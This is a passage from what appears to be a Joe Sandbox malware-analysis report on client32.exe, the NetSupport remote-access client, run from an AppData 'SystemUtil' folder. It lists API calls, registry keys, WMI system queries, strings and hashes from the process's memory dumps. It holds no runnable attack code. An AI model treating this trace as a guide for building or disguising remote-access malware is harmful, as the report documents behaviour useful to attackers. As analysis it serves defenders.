Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
String ID: 1.2$Channel$Client$Publish %d pending services
API String ID: 1112461860-1140593649
Opcode ID: 9006d7f2caca2a33a33a59433770c055a1957a5c864f8d36d6d4dfa1537501aa
Instruction ID: 05e6431e89c6bbd9cb2840a856ec4f4f3eef18c24dba5f8f2298388e6540222f
Opcode Fuzzy Hash: 9006d7f2caca2a33a33a59433770c055a1957a5c864f8d36d6d4dfa1537501aa
Instruction Fuzzy Hash: 6F51D335A046098FDB20DF79E894FBE77B4BB0631CF904129DA6193281FB35D586CB91

Function 110FFCC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 110FFD13
GetStockObject.GDI32(00000004), ref: 110FFD6B
RegisterClassA.USER32(?), ref: 110FFD7F
CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 110FFDBC

Strings

NSMDesktopWnd, xrefs: 110FFCF9, 110FFD78, 110FFDB6

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AtomClassCreateGlobalObjectRegisterStockWindow
String ID: NSMDesktopWnd
API String ID: 2669163067-206650970
Opcode ID: ba085a4a298ca2a35e46e8f911681fa87c9a64f63bde971845e5a7b50153441a
Instruction ID: e76810456149084fb848040635d8e5dd78421bccde4647aa26b9c0cc0d967c72
Opcode Fuzzy Hash: ba085a4a298ca2a35e46e8f911681fa87c9a64f63bde971845e5a7b50153441a
Instruction Fuzzy Hash: 0231F7B5D01259AFCB41DFA9D880A9EFBF8FB09314F50862EE569E3240E7345940CF95

Function 11139340 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89timeCOMMON

Download Yara Rule

APIs

KillTimer.USER32(00000000,00000000,TermUI...), ref: 111393AA
KillTimer.USER32(00000000,00007F4F,TermUI...), ref: 111393C3
FreeLibrary.KERNEL32(76B90000,?,TermUI...), ref: 1113943B
FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 11139453

Strings

TermUI, xrefs: 11139342

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FreeKillLibraryTimer
String ID: TermUI
API String ID: 2006562601-4085834059
Opcode ID: 5e01743d874b38865cae7b9e648c311240cd0068f3dd68cbc61febb588e4f90f
Instruction ID: bc9711c706b9d41bf1b1aa53e8d725085e588c5fb78ea17b568d689d6d6e9679
Opcode Fuzzy Hash: 5e01743d874b38865cae7b9e648c311240cd0068f3dd68cbc61febb588e4f90f
Instruction Fuzzy Hash: F03158B16135349BD202DFE9CDC0A7AFBAAABC5B1C711402AF4258720CF770A841CF92

Function 111419A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11141A10
RegCloseKey.ADVAPI32(?), ref: 11141A74

Strings

ForceRTL, xrefs: 11141A33
SOFTWARE\Productive Computer Insight\PCICTL, xrefs: 111419D7, 11141A0E
SOFTWARE\NetSupport Ltd\PCICTL, xrefs: 111419F0

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpen
String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
API String ID: 47109696-3245241687
Opcode ID: e63fc0104197c16285f621861676926228ecfc9fc055fc562086e3d717edca7f
Instruction ID: a36c5406095c56a7772cd5309942c79e158504ca27ae800c645d53ad84447c87
Opcode Fuzzy Hash: e63fc0104197c16285f621861676926228ecfc9fc055fc562086e3d717edca7f
Instruction Fuzzy Hash: A921CD75F0022A5BE710DAA8CD80F9AF7B89B45714F2045AAD95DF3140E731BE458B71

Function 1110E460 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 1110E3C0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110E3EA
Part of subcall function 1110E3C0: __wsplitpath.LIBCMT ref: 1110E405
Part of subcall function 1110E3C0: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1110E439

GetComputerNameA.KERNEL32(?,?), ref: 1110E508

Strings

\Registry\Machine\SOFTWARE\Classes\N%x.%s, xrefs: 1110E517
\Registry\Machine\SOFTWARE\Classes\N%x, xrefs: 1110E4B0
, xrefs: 1110E501
ACM, xrefs: 1110E4C2

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
API String ID: 806825551-1858614750
Opcode ID: 30defc78da8194f59f94e3ff6dc80a811373b5fd913c6199f279900626096282
Instruction ID: 783a1893864e797c111924e05002c86c7d14abf0d26c6a4cafca36759f9e265b
Opcode Fuzzy Hash: 30defc78da8194f59f94e3ff6dc80a811373b5fd913c6199f279900626096282
Instruction Fuzzy Hash: 4E214936E052A616D301CE369D807BFFFBADF86614F054978EC51D7102F626E5048751

Function 11017520 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 71synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000310,000000FF), ref: 1101755C
CoInitialize.OLE32(00000000), ref: 11017565
CoUninitialize.COMBASE(00000001,?,?), ref: 110175F0

Strings

PCSystemTypeEx, xrefs: 1101759C
Win32_ComputerSystem, xrefs: 1101757D

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InitializeObjectSingleUninitializeWait
String ID: PCSystemTypeEx$Win32_ComputerSystem
API String ID: 2994556011-578995875
Opcode ID: cb70902765e9df780483309619877a5cdd6fdcad1f0a8482e579a40db52188bc
Instruction ID: 2dfd674cbcced21787933601e0fbf0765c8f89b6bf193c9c24077654eb832309
Opcode Fuzzy Hash: cb70902765e9df780483309619877a5cdd6fdcad1f0a8482e579a40db52188bc
Instruction Fuzzy Hash: D62129B1E006669BDF11CBA0CC44B6EB7E89F45358F1000B5FC58DA2C8FAB8E940D791

Function 11140870 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 11140290: GetCurrentProcess.KERNEL32(00000000,?,111404E3,?), ref: 1114029C
Part of subcall function 11140290: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\SystemUtil\client32.exe,00000104,?,111404E3,?), ref: 111402B9

WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111408C5
ResetEvent.KERNEL32(00000254), ref: 111408D9
SetEvent.KERNEL32(00000254), ref: 111408EF
WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111408FE

Strings

MiniDump, xrefs: 11140877

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
String ID: MiniDump
API String ID: 1494854734-2840755058
Opcode ID: b5093043549d72af129595f684cc28810df42538d39778bc18dae4ac23f44b08
Instruction ID: 82be7c26d502f028142b998fa5126df4c28d1bc7d262cc6800bde2f36eb64e35
Opcode Fuzzy Hash: b5093043549d72af129595f684cc28810df42538d39778bc18dae4ac23f44b08
Instruction Fuzzy Hash: F311D675E0022667F700DFE9CC81F9AB7689B05B68F214234F624E66C4E761A5418BA5

Function 11017440 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000310,000000FF), ref: 11017472
CoInitialize.OLE32(00000000), ref: 1101747B
CoUninitialize.COMBASE(00000001,?,?), ref: 11017500

Strings

ChassisTypes, xrefs: 110174B2
Win32_SystemEnclosure, xrefs: 11017493

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InitializeObjectSingleUninitializeWait
String ID: ChassisTypes$Win32_SystemEnclosure
API String ID: 2994556011-2037925671
Opcode ID: f0ded35296c55d0866425beafa263bb65a3590a39d35365136548dea7fc607f2
Instruction ID: d4ceec51b3d1aeb93fa2206dcf0162908bfa0d380c5fa1549f26343d1b5ce827
Opcode Fuzzy Hash: f0ded35296c55d0866425beafa263bb65a3590a39d35365136548dea7fc607f2
Instruction Fuzzy Hash: 29213575D406655BDB12CBA4CC45BAEBBED9F84358F0000A4EC58DB288EF39D900C761

Function 68C68E28 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 68C65000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 68C65014
Part of subcall function 68C65000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,68C68E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 68C65034

CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 68C68EAE
FreeLibrary.KERNEL32(?), ref: 68C68EBF

Part of subcall function 68C62420: _strrchr.LIBCMT ref: 68C6242E

Strings

Set Is247=%d, xrefs: 68C68ED7
pcictl_247.dll, xrefs: 68C68E6C
NSM247Ctl.dll, xrefs: 68C68E7E

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AddressCloseFileFreeHandleLibraryModuleNameProc_strrchr
String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
API String ID: 3215810784-3459472706
Opcode ID: 9a66c0dafa87161934e515a904e3a5d4b4f9c626154bb1641a50ae83aab7ac68
Instruction ID: e039c4220bfff635c390471be562beaecc855eb4590ed27e6ed3db2293c730b9
Opcode Fuzzy Hash: 9a66c0dafa87161934e515a904e3a5d4b4f9c626154bb1641a50ae83aab7ac68
Instruction Fuzzy Hash: A6118179E401199BEF108A51AC81FFE7364EB06329F800075DE19A3240FB31DA84CBA1

Function 111433B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

LoadStringA.USER32(00000000,?,?,00000400), ref: 111433DF
wsprintfA.USER32 ref: 11143416

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

..\ctl32\util.cpp, xrefs: 1114342B
#%d, xrefs: 11143410
i < _tsizeof (buf), xrefs: 11143430

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$ErrorExitLastLoadMessageProcessString
String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
API String ID: 1985783259-2296142801
Opcode ID: ff2748ac2aec15e09c4bdc6ca979aa6eb9a6b499c93e777d6c60cf8ab22b526a
Instruction ID: c1d41daf5ac04f5e509db8cc8d6ef6429d5cf2497d86e7a71f1ea6c6f60715f8
Opcode Fuzzy Hash: ff2748ac2aec15e09c4bdc6ca979aa6eb9a6b499c93e777d6c60cf8ab22b526a
Instruction Fuzzy Hash: 2411E5FAE01228A7C711CAA59D80FEEF77C9B45708F544065FB08B3181EA30AA0587A4

Function 110312C0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 11031376

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

clientinv.cpp, xrefs: 110312EE
226546, xrefs: 11031357
m_pDoInv == NULL, xrefs: 110312F3
%s%s.bin, xrefs: 11031370

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$ErrorExitLastMessageProcess
String ID: %s%s.bin$226546$clientinv.cpp$m_pDoInv == NULL
API String ID: 4180936305-3869819624
Opcode ID: f311d18d2f481ca5885ce355be75c6d4215bfffd3506407d5c18b0736edccc2f
Instruction ID: 6dff70f8b624139b5d8b9928b76f3118b4df96bcfaa22522713f30a32685b050
Opcode Fuzzy Hash: f311d18d2f481ca5885ce355be75c6d4215bfffd3506407d5c18b0736edccc2f
Instruction Fuzzy Hash: 4D2181B5E00705AFD710DF65DC80BAAB7E4EB88758F10857DF825D7681E734A8008B55

Function 11140CE0 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(111413B8,00000000,?,111413B8,00000000), ref: 11140CFC
__strdup.LIBCMT ref: 11140D17

Part of subcall function 11080BE0: _strrchr.LIBCMT ref: 11080BEE

